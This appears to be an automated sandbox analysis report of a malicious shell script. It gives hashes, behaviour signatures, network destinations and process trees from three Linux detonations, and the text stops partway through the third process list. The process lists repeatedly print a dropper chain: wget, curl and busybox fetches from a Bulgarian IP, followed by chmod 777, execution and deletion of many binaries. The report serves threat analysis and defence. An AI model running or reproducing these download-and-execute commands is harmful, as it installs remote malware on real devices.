Analysis Overview
SHA256
d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76
Threat Level: Shows suspicious behavior
The file d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 03:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 03:36
Reported
2024-11-20 03:39
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
7s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
Writes file to tmp directory
Processes
/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/chmod
[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/rm
[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 195.181.164.14:443 | | tcp |
Files
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-20 03:36
Reported
2024-11-20 03:39
Platform
debian9-armhf-20240418-en
Max time kernel
23s
Max time network
25s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /usr/bin/curl | N/A |
Processes
/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/chmod
[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/rm
[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/wget
[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/chmod
[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/rm
[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/wget
[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/chmod
[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/rm
[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/wget
[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/chmod
[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/rm
[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/wget
[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/chmod
[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/rm
[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/wget
[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/chmod
[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/rm
[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/wget
[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/chmod
[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/rm
[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/wget
[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/chmod
[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/rm
[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/wget
[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/chmod
[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/rm
[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/chmod
[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/rm
[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/wget
[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/chmod
[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/rm
[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/wget
[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/chmod
[chmod 777 d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL
[./d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/bin/rm
[rm d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/wget
[wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/chmod
[chmod 777 l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO
[./l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/bin/rm
[rm l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO]
/usr/bin/wget
[wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/chmod
[chmod 777 HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ
[./HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
/bin/rm
[rm HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/863-1-0xb6721000-0xb6732044-memory.dmp
memory/869-2-0xb6726000-0xb6737044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-20 03:36
Reported
2024-11-20 03:39
Platform
debian9-mipsbe-20240611-en
Max time kernel
85s
Max time network
88s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | N/A |
| N/A | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | N/A |
| N/A | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | N/A |
| N/A | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | N/A |
| N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | N/A |
| N/A | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | N/A |
| N/A | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | N/A |
| N/A | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | N/A |
| N/A | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | N/A |
| N/A | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | N/A |
| N/A | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | N/A |
| N/A | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | N/A |
| N/A | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l3Isp6FDowxD7HdCsrYqUhdHh1YkzIDXbO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HbDtUak5awHEelPQ91yKk0AKZkSMVFccVQ | /usr/bin/curl | N/A |
Processes
/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh
[/tmp/d80f3d42233da56d7ad5399a87264c7954456d33ddfdd05cfb02e4663d4c7f76.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/chmod
[chmod 777 fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/tmp/fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk
[./fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/bin/rm
[rm fKU53U2ieULEwov12WiDAsumSe1hcWc7Rk]
/usr/bin/wget
[wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/chmod
[chmod 777 QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/tmp/QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2
[./QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/bin/rm
[rm QEPGlVgpmkANT1TbwlHF6sPwplDOdSeko2]
/usr/bin/wget
[wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/chmod
[chmod 777 CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/tmp/CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy
[./CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/bin/rm
[rm CB6ZBAWRVsSaNJjtJUy0LAAd8oL9Bkmofy]
/usr/bin/wget
[wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/chmod
[chmod 777 RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/tmp/RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0
[./RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/bin/rm
[rm RzEVu6pAAr042B882SzgMD8PjjI9QXS9N0]
/usr/bin/wget
[wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/chmod
[chmod 777 g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/tmp/g94Q6IpdHco1kY4euvU50notlQI0EU32gd
[./g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/bin/rm
[rm g94Q6IpdHco1kY4euvU50notlQI0EU32gd]
/usr/bin/wget
[wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/chmod
[chmod 777 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/tmp/0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg
[./0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/bin/rm
[rm 0Xeb3sPg0Olxx6ljK7rEqsP4aAqGgVvYsg]
/usr/bin/wget
[wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/chmod
[chmod 777 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/tmp/4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs
[./4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/bin/rm
[rm 4I4d4x8d0dMwbxrQVwXu82LhJqqimrCqfs]
/usr/bin/wget
[wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/chmod
[chmod 777 c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/tmp/c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1
[./c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/bin/rm
[rm c3CDgwumI0CdIIr7JedVBmI2PvQ6L02pO1]
/usr/bin/wget
[wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/chmod
[chmod 777 Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/tmp/Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ
[./Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/bin/rm
[rm Lp8bN4j71pgSbqDeJvSVlFk5ahqwIne9JZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/chmod
[chmod 777 Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/tmp/Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB
[./Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/bin/rm
[rm Um2zvwMTR3jfasPlKdHO7iG3TnAWkcumnB]
/usr/bin/wget
[wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/chmod
[chmod 777 fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/tmp/fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV
[./fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/bin/rm
[rm fSUJoRSEfPcfvLtdgQRWyESZOzC2Xl1SBV]
/usr/bin/wget
[wget http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/d2439CSMRhJTZ3nIkOgbCMsBfyxcSeNrwL]
